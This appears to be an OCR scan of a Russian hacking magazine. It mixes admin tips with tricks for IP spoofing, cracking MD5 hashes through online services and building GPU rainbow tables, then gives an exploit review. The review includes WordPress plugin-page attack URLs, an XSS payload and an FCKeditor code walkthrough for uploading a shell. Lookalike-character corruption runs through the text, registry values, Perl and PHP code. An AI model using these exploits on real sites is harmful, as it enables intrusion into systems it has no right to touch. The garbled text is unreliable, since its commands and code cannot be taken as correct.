клиенты под различные мобильные платформы ты найдешь во врезке]. 



ТРИК 9: ПОДКЛЮЧЕНИЕ К КОР ЧЕРЕЗ ББН 

Поднять 55Н-туннель и пустить через него ѴІЧС или ПРИ сессию проще 
простого. Однако для доступа к удаленным хостам по ПРИ-протоколу есть 
специальная утилита ѴѴІ55Н ( ѵѵѵѵѵѵ.ѵѵібзЬ.сопп ]. ѴѴІ55Н позволяет осущест- 
влять доступ через Оаіеѵѵау 55Н-сервер к компьютерам со следующими 
системами: ѴѴіпсІоѵѵз 2000 Тегтіпаі Зегѵегз; ѴѴіпсІоѵѵз 2003 Тегтіпаі Зегѵегз; 
ѴѴіпсІоѵѵз ІЧТ Тегтіпаі Зегѵег Есіібоп; ѴѴіпсІоѵѵз ХР и ѴѴіпсІоѵѵз 2000/2003 с 
включенным Петоіе Оезкіор. Пользователи смогут работать на удаленной 
машине также, как если бы находились непосредственно рядом с ней. 



ТРИК 10: АВТОМАТИЗАЦИЯ 

Об одном из видов автоматизации мы уже говорили. В случае исполь- 
зования РиТТѴ Соппесбоп Мападег для любого соединения можно 
задать последовательность команд, которые будут выполняться после 
успешного входа на удаленной системе. Вот еще один способ упро- 
стить жизнь админу, в распоряжении которого имеются несколько сер- 
веров с одинаковой конфигурацией. С помощью утилиты СІизІегЗЗН 
( сіизіегззб.зоигсеіогде.пеі: ) можно администрировать сразу несколько 
удаленных хостов. Прога открывает несколько ЗЗН-соединений с 
различным узлами, а также одну общую администраторскую консоль. 
Любая команда, набранная в этой консоли, реплицируется, т.е. пере- 
дается по всем ЗЗН-соединением. Это избавляет тебя от повторения 
монотонной работы. К сожалению, подобное решение есть только под 
никсы. СІизІегЗЗН управляет несколькими окнами хіегт через единый 
интерфейс, причем сам он частично написан РегІ/ТК. 

ТРИК 1 1 ЗАЩИТА ОТ БРУТФОРСА 

Авторизация при помощи логина и пароля считается самой небезо- 
пасной. В большинстве случаев рекомендуется вообще отключать ее 
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МѴЕЫТиММЕЬ ГАРАНТИРУЕТ, ЧТО С 55Н-ТУННЕЛ ЕМ 
БУДЕТ ВСЕ В ПОРЯДКЕ 



на сервере, а заодно деактивировать поддержку устаревшего про- 
токола 55Н1 . Чтобы сделать это в ОрепЗЗН — а он наиболее распро- 
странен — необходимо внести поправки в конфиг: 

ѵі /еСс/зз]т/зз]т(і_соп^ід 

[. . .] 

РгоСосоІ 2 

РаззѵѵогЛАиЩтепЦісаСіоп по 

ТЦзеРАМ по 

[. . .] 

Если отключать авторизацию не хочешь, то надо установить прими- 
тивную систему предотвращения вторжений. Например, БзЬдиагсІ 
[ ззбдиагсі.зоигсеіюгде.пеі ). Простой демон проверяет записи 
в журналах (зузіод, зузіод-пд, теіаіод, тиШІод, гаѵѵ] и способен 
вычислять подозрительную активность вроде попыток подбора 
паролей. Для блокировки таких ІР-адресов используется локаль- 
ный фильтр пакетов (рі, іріѵѵ, пеІбиег/ірІаЫез или файл Ьозіз. 
аііоѵѵ]. Поддерживаются сервисы ззбсі, боѵесоі, ргоіірсі, риге-іірсі, 
ЕгееВЗй іірсі, ІЭѴѴітар (ітар, рор]. Аналогично работают Раі12Ьап 
[ уууууу.Еа і 12 Ьа п .о гд ] и ЗзЬсШІІег [ Шр://ѵѵѵѵѵѵ.с5с.иѵ.ас.ик/~дгед/ 
ззбббііегі. пг 
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ЛЕОНИД «РОЮ» ОТРОЙКОВ АНДРЕИ «5КѴ02» КОМАРОВ 

/вошгамАп.ки/ 



№1 



ЗАДАЧА: НАСТРОИТЬ КОРРЕКТНОЕ 
ОТОБРАЖЕНИЕ КИРИЛЛИЦЫ В АНГ- 
ЛИЙСКОЙ ВИНДЕ 



РЕШЕНИЕ: 

Многие крупные порталы (к примеру, забугорные шопы] нещадно палят настрой- 
ки оси, втом числе и языковые. Какты понимаешь, попытки выдать себя за де- 
мократичного американца или жителя далекой африканской страны сводятся на 
нет. На этот случай написано немало софта, втом числе и известная КагбаТооІз, 
которая помогаетзамаскировать конфигурацию ОС, браузера и часового пояса. 
Но, увы, подавляющее большинство подобных утилит работают л ишь с осликом, 
не поддерживая сторонние браузеры. Поэтому многиетоварищи попросту 
устанавливаютсебе английскую версию ѴѴІпбоѵѵз, что в свою очередь приносит 
ряд проблем с корректным отображением кириллицы. Однако решение есть, и 
сейчас мы его подробно рассмотрим. Итак, чтобы раз и навсегда настроить язык, 
делаем следующее. 

1. Вносим изменение в реестр в ключ нкеу_ьосаь_МАСНШЕ\зортшше\ 
міскозоЕТ\шшомзыт\сшкЕытѵЕкзіоы\ЕОЫтзивзтітитЕЗ\, а именно 
— меняем значения у параметров: 

"М3 ЗЬеІІ Б1д" = "М3 Запз Зегіб,204" 

"М3 ЗНеІІ Бід 2" = "М3 Запз Зегіі,204" 

2. Далее ищем ключнкеу_ьосаь_масніые\зоетмаке\міскозоет\ 
ШШОМЗБТХ СШКЕЫТѴЕКЗІОЫХ ЕОЫТМАРРЕК\ и ВНОСИМ корректировки: 

"АКІАЬ" = (ЩлГОгеН ООООООсс 
" БЕЕАІІЬТ " = бѵгогсі: ООООООсс 

3. Теперь открываем ключ НКЕУ_ЬОСАЬ_МАСНШЕ\ЗУЗТЕМ\ 
СШКЕЫТСОБТКОЬЗЕТ \ соыткоь \ыьз \ ссюе расе \ и уста на вливаем: 

"1251" = "С_1251.ПІЗ" 

"1252" = "с_1251.п1з" 

"866" = "с_8бб.п1з" 

"АСР" = "1251" 

"ОЕМСР" = "866" 



мз змоій 



ок 




^САЛіаг ГИМНА... 

‘ ЦбнВДО НЕС_П 

І*Ѵ* О ккл 

ЙК Л 

|Н*М 

*кл 

*и5*#.,а НЕС_Н 

НЕ С_52 

^геэмлйд НЕС_5г 

-дгвзчлоівг дал 

^5пчІ РОп^.С ЙК_Н 

ЙК_$2 



Ащі, 2С* 

№4,Пн| 

АиіДбі 

Агйгд« 

СШжЫИмДН 

СлдірПр*,™ 

С*д1егМ**20 * 



Сим ГИМ.1ЁІ 
слип» гниды 
С&ліг ГИм.2СНІ 

№ ісгС 

М5 5№Г-5вг^НН 
М5ЭДГДО 



Іуйвт.го* 



Настраиваем отображение кириллицы 



" МАССР" = "10007" 

"ОЕМНАЬ" = "ѵда866 . боп" 

Вот, собственно, и все. А с ѴѴІпХР можно сделать еще проще. 

1. Создаем файликс расширением .гед следующего содержания: 

[НКЕУ_Ь0САЬ_МАСНШЕ\ЗУЗТЕМ\СиггепЬСопЬго13еЬ\СопЬго1\Ы1з\ 

СобеРаде] 

"1252"=" с_1251.п1з" 

[ НКЕУ_ЬОСАЬ_МАСНШЕ\ ЗОЕТШтЕУМІСГОЗОбЬ \Мпбоѵтз ЫТ\ 
СиггепЬѴегзіопХРопЬЗиЬзЬіЬиІіез] 

" АгіаІ , 0 " = " АгіаІ ,204" 

"Сошіс Запз М3, 0" = "Сошіс Запз М3, 2 04" 

"Соигіег, 0" = "Соигіег Неѵц2 04" 

"Місгозобб Запз Зегіб , 0 " ="МісгозоЫ: Запз Зегіб,204" 

" ТаПота , 0 " = " ТаПота ,204" 

"Тітез Бем Котап, 0 " = "Тітез Иеѵг Котап,204" 

"Ѵегсіапа, 0" = "Ѵегсіапа,204" 

2. Переходим в «Панельуправления Языки региональные стандарты -> 
Дополнительно» и отмечаем необходимые русские кодировки. 

3. Перезагружаем комп и радуемся корректному отображению кириллицы. 



№2 



ЗАДАЧА: ВЫБРАТЬ И УСТАНОВИТЬ 
ПОДХОДЯЩУЮ ОСЬ НА РІ.А5Н 



РЕШЕНИЕ: 

С появлением объемных РІазЬ установка полноценной ОС на них стала реальна как 
никогда. Думаю, не нужно описывать все преимущества обладания портативной 
осью, настроенной под твои нужды и задачи и располагающейся на переносном 
ИЗВ-накопителе. Возникаетлишьодин вопрос: какую ОС выбрать и как ее уста- 
новить? За последнее время появилось немало Линух-дистрибутивов, способных 
работать с РІазЬ, однако хочу обратить твое внимание на новый проект — Саісиіаіе 
Ыпих йезкіор [ ѵѵѵѵѵѵ.саІсиІаЕе-Ііпих.ги ]. Ось базируется на Ѳепіоо Ыпих и является 



полноценной операционной системой, способной работать нетолько с ЫѵеСО, но и 
с ІІЗВ-РІазЬ накопителями. Из особенностей выделим: 

• Интеграция с Саісиіабе Бігесбогу Зегѵег (еще одним ответвле- 
нием проекта Саісиіабе Ьіпих) 

• Наличие удобного и дружественного десктопа 

• Полная совместимость с ОепЬоо Ьіпих 

• Возможность работы с ЬіѵеСБ с полной загрузкой в память 

• Обширный языковой пакет : английский, испанский, немецкий, 
португальский, итальянский, русский, украинский, польский и 
французский 
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СаІсиЫе Іішіх - это открытый проект по внедрению Ыпих повсеместно, Проект представляет 
свободный и легкий доступ ко всем возможностям Оепіоо, 
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• Возможность установки на НББ, бЗВ-РІазЬ. и ІІЗВ-НББ с файловыми 
системами: ехб4, ехкЗ , ехб2 , геізегТз, хбв и ]Сз 

Процесс установки предельно прости понятен: 

1. Грузимся с СОЛЖ)-диска, на который был предварительно закатан СаІсіМе 
І_іпих йезкЬр (слить ось можно с официального сайта — ѵѵѵѵѵѵ.саісиіаіе-ііпих.ги і. 

2. Разбиваем диск/флешку с помощью (бізк’а: 

Мізк <с!гіѵе> 

где <бгіѵе> — имя девайса. 

3. Форматируем созданные разделы, из разрешенных файловых систем — ехЫ, 
ехТЗ, ехТ2, геізеНз, х^з и фз. 

^Определяемся с основными параметрами установки: 



• <іізк=/с1еѵ/зс1а2 - раздел для установки (по дефолту будет пред- 
ложен свободный раздел зба2 или збаЗ ) 

• зеб-шагс1і=іб8б (х8б_б4) — установить дистрибутив для 32 или 
64 -битной архитектуры процессора 

• зеб-іогшаб=геізегГз (ехбЗ, ехб2 , різ, хбз) - тип файловой 
системы 

• зеб-ѵібео_гезо1ибіоп=1280х1024 (1024x768, 1152x864, 

1280x800 и т.д. ) - разрешение экрана 

• зеб-козбпате=1ігшх — сетевое имя компа 

• зеб-шЬг=оГб — не изменять МВК во время установки 

• зеб-сошрозібе = опіоГГ — включение композитного режима 

После установки ты получишь надежную и функциональную, а главное — порта- 
тивную Ыпих-05. 

Кстати, дополнительные пакеты и документацию ищи на официальном сайте 
проекта. 



ЗАДАЧА: ЗАШИФРОВАТЬ ВИНТ 
НОУТА/КОМПА, ВКЛЮЧАЯ ЗАГРУ- 

ЗОЧНЫЙДИСК 

РЕШЕНИЕ: 

На страницахжурнала мы не раз рассказывали о различных средствах 
шифрования данных, но времена идут, алгоритмы меняются, а софтуста- 
ревает. Именно поэтому при покупке нового ноута или очередного винта 
встает вопрос о безопасности хранимых на нем данных. Как ты знаешь, 
большинство крипто-утилит работа юте виртуальными контейнерами, в 
которых и хранят шифрованную инфу. Такой подход устраивает далеко не 
всех, ведь гораздо удобнее, когда используется шифрование всего дис- 
ка. Потакому принципу работает софтина ОгіѵеСгурІ:, которой мы и вос- 
пользуемся для достижения поставленной цели. Итак, план действий: 

1. Сливаем утилу и и нетал им ее. 

2. Перезагружаем комп. 

3. Запускаем тулзу и создаем ключ шифрования, атакже выбираем 
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способ и место хранения ключа. Я бы рекомендовал хранить файликс 
ключом на флешке, предварительно сделав бэкап. 

4 . Устанавливаем пасс на крипт, чем сложнее — тем лучше. 

5 . Переходим на вкладку «Огіѵегз», выбираем загрузочный диск (напри- 
мер, С:\] и жмем кнопку «Заш. Загр.» 

6. Выбираем окно запроса пароля, а именно — вид десктопа при вклю- 
чении компа. На выбор предлагаются три варианта: 

• Б08 (без графики) 

• Ѵезка (с графикой) 
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ЗАДАЧА: ОТПАРСИТЬ ПРОКСИ- 
СЕРВЕРА ИЗ ТЕКСТОВОГО ФАЙЛА 



РЕШЕНИЕ: 

Проксики являются неотъемлемым атрибутом нашей жизни :). Поэтому 
ежедневно приходится обрабатывать множество прокси-листов, что отнимает 
п-ное количество времени. Не та к давно мне на глаза попался универсальный 
парсер проксиков — «Ріпб ргохіез!ог Ме». Он без труда ищет и выдираетзавет- 
ные строчки из сотен байт мусора. Тулза умеет действительно многое: 

• Парсинг прокси из текста, который предварительно можно ско- 
пировать в соответствующее поле для ввода 

• Парсинг прокси из буфера обмена 

• Возможность парсинга с учетом ІР или портов 

• Автоматический чекинг корректности проксиков (маска ІР: 
ааа,ЪЪЬ, ссс , сІсІск=255 , а также проверка порта: еееее<=6553б ) 

Отпарсить проксики с помощью утилиты весьма просто: 

1. Копируем текст, содержащий прокси, с бесплатных прокси-порталов. 
Например: 



61.172.249.96:80 апопушоиз 


СЬппа 


2009-07' 


-20 


Шоіз 








75.151.214.249:8080 


апопушоиз 


ШіЕесІ ЗЕаЬез 


2009-07-20 Шіоіз 








72.55.136.167:3128 


апопушоиз 


Сапасіа 


2009-07- 


20 Шюіз 








189.108.93.244:3128 


апопушоиз 


Вгагіі 


2009-07- 


20 Шюіз 








189.127.163.1:3128 


апопушоиз 


Вгагіі 


2009-07- 


20 Шіоіз 








213.185.116.218 3128 


апопушоиз 


Ігад 


2009-07- 



1 ЗАДАЧА: НАХОЖУСЬ В ЛОКАЛКЕ 

^ И ЧУВСТВУЮ, ЧТО ПРОТИВ МЕНЯ 
■_І ПРИМЕНЕНЫ АСЬ-ЛИСТЫ. КАК 

1 БЫТЬ? ВОЗМОЖНОСТЬ ИЗМЕНЕНИЯ 

МАС’А НА СЕТЕВУХЕ ВРОДЕ БЫ ИМЕЕТСЯ, НО ЭТО НИ 
КЧЕМУ НЕ ПРИВОДИТ 

РЕШЕНИЕ: 

Действительно, не каждая карта позволяет явно сменить МАО через 
«Свойства» сетевой карты, хотя существует огромное количество софта 
для этого. Даже если и сменили, не факт, что отслеживаюттебя по МАО, а 
не по ІР! Давай отвлечемся и посмотрим в другую сторону, а именно — на 
сетевое взаимодействие. Есть прекрасная программа 5!егт, выпущен- 
ная создателями Саіп&АЬеІ. 

Наши действия таковы: 

1. Запускаем, открываем вкладку сверху «Сопбдиге». 
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• ВІЮ Віаск Зсгееп (черный экран с имитацией ошибки винчестера; 
рекомендуется ) 

Т.Теперь переходим кшифрованию, отмечаем нужные разделы, жмем 
кнопку «Зашифровать» и указываем ранее созданный ключ для крипта. 
Все, идем пить пиво, весь процесс шифрования займет пару часов, в 
зависимости от размера винта. 

Утила платная, поэтому мы сознательно не стали выкладывать ее на 
нашем диске. Воспользуйся Гуглом, наверняка, ты все найдешьсам :). 



20 Шіоіз 

78.108.96.47:8080 апопушоиз СгесД КериЫіс 

2009-07-20 Шюіз 

189.56.61.33:3128 апопушоиз Вгагіі 2009-07- 

20 Шіоіз 

222.218.156.66:80 апопушоиз СДіпа 2009-07- 

20 Шіоіз 

2. Запускаем утилу. 

3. Указываем путьдо файла со скопированнымтекстом, либо вставляем текст в 
формочку (режим Тех!]. 

4 . Жмем старт (сортировка по ІР/порту — на выбор] и получаем списокпрокси- 
ков, который сохраняем и используем по назначению. 




дшмдиими 



2 . Выбираем сетевой интерфейс (в этом процессе внимательно смотри на 
подсети]. 

3. Вбиваем новый ІР в ЗрооіюсІ Зоигсе АсІсІгезБ. 

Простейший пример применениятакого рода защиты: 

# настройки . ІШассезз-файла 
ОрДіопз +Ро110№ЗутЬіпкз 
КеѵлгіТеЕпдіпе оп 

# 

# доверенный ІР 

КеѵггікеСопсІ %{КЕМОТЕ_АООК} ! л 1\ . 2\ . 3\ . 4$ 

# сторонний ІР 

КеѵггікеСопсІ %{КЕМОТЕ_АООК) ! А 5\.6\.7\.8$ 

КевдгіДеКиІе . * ІШЩр : //шт. доодіе . сот/ [К=302,Ь] 

В примере все типы с ІР'шниками, кроме доверенного (например, адреса 
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какого-либо разработчика), будут отправлены на Соодіе. Еще пример: 

# настройки «аііою/сіепу» .Ьбассезз-файла 

сіітіб СЕТ> 

забізбу апу 

огбег бепу,а11сж 

сіепу б гош аіі 

а11<ж бгот 63.76.22.2 

аіісж бгот 130.116.16. 

аііом бгот 130.116.17. 



аііом бгот 130.116.18. 
аііоет бгот 130.116.19. 
аііом бгот 144 . 110 . 36 . 
гедиіге ѵаііб-изег 
</1ітіб> 

Если среди твоих друзей найдутся толковые программисты, можешь 
посоветоваться с ними на тему написания инжектора пакетов, где адрес 
отправителя подменялся бы на вводимый вручную. Для этого обязатель- 
но понадобится дополнение — библиотека, вроде ѴѴіпрсар или ЫЫщесЕ 



ЗАДАЧА: МАКСИМАЛЬНО БЫСТ- 
РО РАСШИФРОВАТЬ МБ5, ЕСЛИ 
НЕ ХВАТАЕТ ВЫЧИСЛИТЕЛЬНЫХ 
МОЩНОСТЕЙ У КОМПА 

РЕШЕНИЕ: 

Небеда! Сломаешьбанк— купишьновый комп. Аесли серьезно, для решенияза- 
дачи можно воспользоваться существующими серверами для взлома известных 
криптографических хешей онлайн. Скажем, один из наиболее известных русско- 
язычных — НазЬсгаскіпд.іпбо. На самом деле, их можно перечислять десятками, 
просто не все эффективны, потому что на одном искомый пароль может быть, а на 
другом нет. Для этого стоит воспользоваться специальным софтом под названием 
НазЬЗеагсбег. Автор софтины — таіІЬгизб. Программа осуществляетавтома- 
тизированный поискпо Ібсервисам для ІѴЮ5-крекинга. Вотнекоторые из них: 
базіісгаскіпд.іпію . тсіб.гесіпоіге.сот . Ітіо.огд . тсібразз.іпію . тіІѵуОгт. 
сот . Вбивай хеш, запускай прогу и жди результата! Если хочешь, можешь сам 
попробовать написать средство своими силами. Пример взаимодействия с одним 
изтаких сервисов на Регі: 

$ш:1 = "кббр : / /шсЗБ . йазЬсгаскіпд . сот/ зеагсЬ. . рЬр?тб5 = $]іазЬ.»; 
$1мр = ШР: :ПзегАдепб->пеѵ/( ) ; 

$1ѵф->адепб ( "Могіііа/Б . 0 (Мпскжз; II; МпскжзЫТБ.І; еп; 
гѵ: 1.9. 0.4) Сеско/2 00810292 0 Рігебох/3 . 0 . 4 " ) ; 

$соппесб = $1мр -> деб ($ш:1) ; 
ргіпб «шб5 . казЬсгаскіпд. сот «; 



II ($согтесб->сопбепб =~ /Сіеагбехб об $Ьаз1і із (.*)/) 
{ 

ргіпб "Кезиіб : $1\п" ; 

} еізе { 

ргіпб "Кезиіб : НазЬ поб боипсП\п" ; 

} 




Проспуфить адрес источника проще пареной репы! 




№7 



ЗАДАЧА: СГЕНЕРИРОВАТЬ БОЛЬ- 
ШУЮ РАІЫВОѴѴТАВЬЕ, ИСПОЛЬЗУЯ 
ОРУ 



РЕШЕНИЕ: 

Идея ясна —ты хочешь, используя мощи своей видеокарты, быстрее 
генерировать«радужныетаблицы»для атаки на криптографические 
хеши, а средства для этого днем согнем не найти, потому что существу- 
ющие проекты, вроде ѵѵіпгідеп, работают исключительно на мощностях 
процессоров. Для взаимодействия с ОРІІ тебе нужно воспользоваться 
специальной модификацией, автором который является 2Ьи Ббиапдіеі. 
Найти такую (гідеп США] и само средство для взлома можно на сайте 
рго|ес1:-гаіпЬоѵѵсгаск.сопп . Такая же тема есть от нашего соотечественни- 
ка Х5егд. Разберем работу на примере первой: 

# синтаксис ничем не отличается от привычной тулзы , кроме 
того, что тебе потребуется указать количество ядер видеокарты, 
которые будут задействованы в работе 

КаіпЪоѵбГаЫеСепегабе . ехе тб5 аірка 1 8 0 2400 40000000 хек 240 

Теперьобъясню параметры подробнее: 

• МсІ5 — генерация соответствующего типа хеша; 



• аірба — только буквы; 

• 1 8 — искомый парольот одного до восьми СИМВОЛОВ; 

• 0 — индекс; 

• 240040000000 — длина цепочки; 

• хек — префиксдлятаблицы; 

• 240 — количество задействованных ядер видеокарты. У меня — СеЕогсе 

• •6ТХ280. Их количество равно 240 соответственно. 

Для известных видеокартпоследняя опция дана всправочном варианте. □□ 




Автоматизированный поиск 
куда более удобное занятие, чем 
использование собственных 
вычислительных мощностей для 
взлома простейшего хеша 



Работа с США при генерации 
«радужн ых та блиц» 
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ЕКЗРЮІТОѴ 



Жаркий август прямо-таки плавитуставшие мозги разработчиков. 
Хакерыже, наоборот, прилагают все больше и большеусилий для по- 
иска знаменательных уязвимостей в самых различных приложениях. 
Вот и сегодняшний обзор порадует свежим урожаем багов в таких из- 
вестнейших продуктах, какѴѴогсІРгезз, МесІ іаѴѴікі, Моііііа Рігебох, М5 
Іпіегпеі Ехріогег вместе с компонентами М5 СЖісе, а также в целой куче 
ѵѵеЬ ств, в которых используется ѴѴУЗІѴѴУб-редактор РСКебКог. 



НЕДОСТАТОЧНАЯ ПРОВЕРКА 
ПРИВИЛЕГИЙ ВѴѴ0К0РРЕ55 



» Вгіе* 



Поискдыр в известнейшей блоговой платформе ѴѴогсІРгеББ становится 
для многихуже не просто увлекательным занятием, но и самым настоя- 
щим хобби. Вот и на этот раз ребята из СогеЗесигіІуТесЬпоІодіез [ ШрУ/ 
ѵѵѵѵѵѵ.согеБесигіІѵ.сопп/согеІаЬБ І обнаружили, что движок некорректно 
проверяет права доступа у непривилегированных пользователей при 
просмотре (а также редактировании и сохранении] страниц конфигурации 
самых различных плагинов. Удаленный авторизованный пользователь 
можетлегко внедрить свой Х55-код в конфиги плагинов, а также просмот- 
реть другую чувствительную информацию. 

Редактированиеопций плагинов обычно проходитчерез сценарий . / 
ѵф-асЗтіп/орСіопз-депегаІ . р!ір?раде= [р1идіп_раде] , в котором 
с проверкой привилегий все нормально. Но никто неотменял обращение 
напрямую к. /ѵѵр-асітіп/асі тіп.рЬр, который и отвечает за инклуд плаги- 
нов. Для понимания уязвимости рассмотрим код это го скрипта подробней: 

//проверка того, что страница плагина находится в своей 
директории . /ѵф-сопДепС/рІидіпз 
іі ( іззеб ( $_СЕТ [ 1 раде ' ] ) ) 

{ 

$р1идіп_раде = зСгірзІазйез ($_СЕТ[ 'раде' ] ) ; 
$р1идіп_раде = р1идіп_Ьазепаше ( $р1идіп_раде) ; 

} 



ѵтр_с1іе ( ( ' Іпѵаіісі ріидіп раде ' ) ) ; 

} 

іі (! ( 1і1е_ехізбз (ШР_РШСШ_БІК . "/$р1идіп_ 
раде") && із_іі1е (Ш>_РШСШ_БІК . " /$р1идіп^)аде" ) ) ) 

ѵтр_сііе ( зргіпбі ( ( ' Саппоб Іоаб %з . ' ) , 

ЦДтІепДіДіез ( $р1идіп_раде) ) ) ; 
с!о_асЦіоп ( ' Іоаб- ' . $р1идіп_раде) ; 

//собственно, инклуд страницы плагина 
іпсіибе (ШР_РЬШШ_Б1К . " /$р1идіп_раде" ) ; 

} 

Как видно, валидацию проходят только физически расположенные на 
жестком диске файлы плагина. Никаких проверок на права доступа к ним 
нети в помине. 



»ТагдеІ5| 



ѴѴогсІРгеББ 2.8 и ниже. 
ѴѴогсІРгеББ МІ) 2.7.1 и ниже. 



» Ехріоід 



В примере авторы приводят следующие векторы использования: 

1. Просмотр конфигурации плагина Соііарзіпд АгсЫѵез: 

ЪРбр: // [зоте_ѵ\Югс!ргезз_Ыод] /ѵѵр-абшіп/а(3шіп.р]тр?раде=/ 
соІІарзіпд-агсМѵез/орбіопз . бхб 

2. Просмотр информации обантиспам-плагине Акізтеі:, идущем вдефол- 
тном дистрибутиве вордпресса: 

ЪРбр: // [зоте_ѵ\Югс1ргезз_Ыод] /ѵѵр-абшіп/абшіп. 
р]гр?раде=акізте1г/геа(іше . бхб 



// Напбіе ріидіп абшіп радез . 
іі (іззеб ($р1идіп_раде) ) 

{ 

іі ( ѵа1ібаЦе_іі1е ( $р1идіп_раде) ) 
{ 




З.Х55 в плагине Пеіаіесі ѴѴаузТоТаке Асбоп: 
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кіір: // [зоте_ѵгогсіргезз_Ъ1од] /\л7р-асітіп/асітіп . 
ркр?раде=геіаіес1-ѵ\гауз-іо-іаке-асііоп/орііопз . ркр 

Для использования бага вставляем в поле«ЕхсІис!еасйоп5 Ьуіегпп» код: 

\ " /><зсгірі>аіегі ( Зігіпд . іготСкагСосіе ( 88 ) +8ігіпд . 
ІготСкагСосіе (83 ) +8ігіпд . ІготСкагСосіе ( 83 ) ) </ 
зсгіріхакгеі= " 

4. Просмотр ОазЬЬоагсІ-плагина ѴѴРЗесигкуЗсаппег: 

кіір: // [зоте_ѵгогсІргезз_Ъ1од] /\л7р-асітіп/асітіп . 
ркр?раде=ѵ\7р-зесигііу-зсап/зесигііузсап . ркр 



ЗепсІІІрІоасІКезиІіз ( ' 1 ' , ' ' , ' ' , 

’Тке " " 1 . $зСошшап(3 . 1 " " соттапсі ізп\ ' і аііомесі' ) ; 
// Скеск іі іі із ап аііомесі Руре. 

ІР ( ! ІзАІІомесІТуре ( $зТуре ) ) 

ЗепсШріоасІК.ези1із ( 1 , ' ' , ' ' , 

'Іпѵаіісі Руре зресіРіесЗ' ) ; 

Еіі.еііріоасі ( $зТуре, $зСиггепіРоісіег , $зСоттапсі ) 

?> 

Здесь нас интересует функция определения текущей директории — 
ОеЮиггепіРоШегО, найти которую мы сможем в сценарии ./есІіРог/ 
ЕІеппападег/соппесІюгз/рЬр/іо.рНр: 



5. Реконфигурация плагина ІпРгизіоп ОеРесРіоп Зузіет: 

кіір: // [зоте_ѵюгсІргезз_Ъ1од] /ѵгр-асітіп/іпсіех. 
ркр?раде=ѵф-іс1з/ісІз-асітіп .ркр 

Оригинальный текст а бѵізогу ищи по ссылке ИНрУ/ппіІѵѵОгпп.сопп/ 
ехрІоіРз/9 1 1 0 . 



»50і_ілюм 



Самым лучшим решением для устранения уязвимости будетобновление 
своего блога до последней версии, представленной на ѵѵогбргезз.сот (на 
данный момент — 2.8.1]. 




ЗАГРУЗКА ПРОИЗВОЛЬНЫХ 
ФАЙЛОВ В РСКЕОІТОР 



»ВгіеГ 



РСКесІіРог, наряду сТіпуМСЕ, является одним из наиболее распространен- 
ных ѴѴУ5ІѴѴУ0 -редакто ров и используется втаких известных ѴѴЕВ-прило- 
жениях, как2оре, РНРЫзІ:, РаІі4СМ5, РипСМЗ, Оокеоз, ІЧике ЕТ. 

Для этой уязвимости в Сети присутствуют очень скудные описания, из 
которых понятно только то, что уязвим параметр «СиггепіРоШег» (напри- 
мер , уууууу,зшЯ1Ы^Ьл2У/уи]Л^ 

сот/Ыб/31812 ].Таккактакое положение дел меня вовсе неустраивало, 
пришлосьсамому покопаться в исходниках описываемого НТМЕЬазеб 
редактора. 

Итак, качаем последний уязвимый релиз ( ШрУ/сІІп.сІІ.зоигсеІюгае.пеі:/ 
зоигсеЬгаеЛскебіІог/ЕСКебіІог 2.6.4.гір 1 и открываем сценарий, ответст- 
венный за иріоасі файлов во встроенном файлменеджере скрипта — ./ 
ебіІюг/ЕІетападег/соппесІюгз/рЬр/ирІоасі.рЬр: 

<?ркр 

$зСиггепіРоісІег = СеіСиггепіРоісІег ( ) ; 

// Із епаЫес! іке иріоасі? 

іі ( ! ІзАііомесіСоттапсі ( $зСотшапсі ) ) 



ДОМАШНЯЯ СТРАНИЦА ПРОЕКТА МЕРІАѴѴІКІ 




іипсііоп СеіСиггепіРоісІег ( ) 

{ 

іі ( ! іззеі ( $_СЕТ) ) { 
дІоЬаІ $_СЕТ; 

} 

$зСиггепіРоісіег = іззеі ( $_СЕТ [ 1 СиггепіРоісіег ' ] ) ? 

$_СЕТ [ ' СиггепіРоісіег 1 ] : ' / ' ; 

// Скеск іке сиггепі іоісіег зупіах (тизі Ьедіп апсі 
зіагі міік а зіазк) . 

іі ( !ргед_таіск( ' |/$Г , $зСиггепіРоісІег ) ) 
$зСиггепіРоісІег .= '/' ; 
іі ( зігроз ( $зСиггепіРоісіег , ' /' ) !== О ) 

$зСиггепіРоіс1ег = '/' . $зСиггепіРоісіег ; 
// Епзиге іке іоісіег раік каз по сіоиЫе-зіазкез 
ѵткііе ( зігроз ( $зСиггепіРоісІег , '//') !== іаізе ) 

{ 

$зСиггепіРоісІег = зіг_геріасе ( 

' $зСиггепіРоіс1ег) ; 

} 

// Скеск іог іпѵаіісі іоісіег раікз ( . . ) 
іі ( зігроз ( $зСиггепіРоісіег , ' . . ' ) | | 

зігроз ( $зСиггепіРоісіег , "\\" )) 

ЗепсіЕггог( 102, ' ' ) ; 
геіигп $зСиггепіРоісіег ; 

} 

Атакже функция, собственно, загрузки и сохранения файлов ЕіІеЕІрІоасіО 
из ѴебіІюг/бІеппападег/соппесІюгз/рЬр/соппппапсІз.рЬр: 

іипсііоп Еііеііріоасі ( 

$гезоигсеТуре , $сиггепіРо1сІег , $зСогшпапсі ) 

{ 



// Мар іке ѵігіиаі раік іо іке іосаі зегѵег раік. 
$з8егѵегБіг = ЗегѵегМарРоісіег ( $гезоигсеТуре, 
$сиггепіРоісіег , $зСошшапсі ) ; 

// Сеі іке иріоасіесі іііе паше. 

$зРііеМаше = $оРііе [ ' пате ' ] ; 

$зРііеЫаше = ЗапііізеРііеМате ( $зРііеЫаше ); 

$зРііеРаік = $з8егѵегБіг . $зРііеМате ; 



ЧИТАЕМ АКІ5МЕТ/КЕА0МЕ.ТХТ ЧЕРЕЗ БАГУ В ѴѴ0К0РКЕ55 
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САІ.С.ЕХЕ, ВЫЗВАННЫЙ ЧЕРЕЗ ПЕРЕПОЛНЕНИЕ В РІКЕРОХ'Е 



!\ К 

$«1ес( іЬ* Тйе Ііріоікіег’ Іо и« Кеіоигс* Тур« Сштп* роИ*г Сщюгп Ррк>*4<г ТШ. 

РНР . Мог» . ММІ рНрЧОО 




УСПЕШНАЯ ЗАГРУЗКА ШЕЛЛА В РСКЕ01Т0Р 



Википедией и множеством других вики-сайтов, некий АтаШіеа 13 июля 
сего года нашел замечательную Х55-уязвимость. 

Бага присутствуете файле ./іпсІибез/зресіаІз/ВресіаІВІоскір.рЬр и прояв- 
ляется на странице зИе.сот/іпсІех.рЬр/ЗресіаІ: Віоск. 

Итак, рассмотрим механизм действия подробнее: 

<?р1тр 



тоѵе_ир1оас!ес1_:Еі1е ( $оРі1е [ ' бтр_пате 1 ] , 
$зРі1еРаД]г ) ; 



} 

Функция 5егѵегМарРоШег(] просто возвращает полный кэШег раШ на 
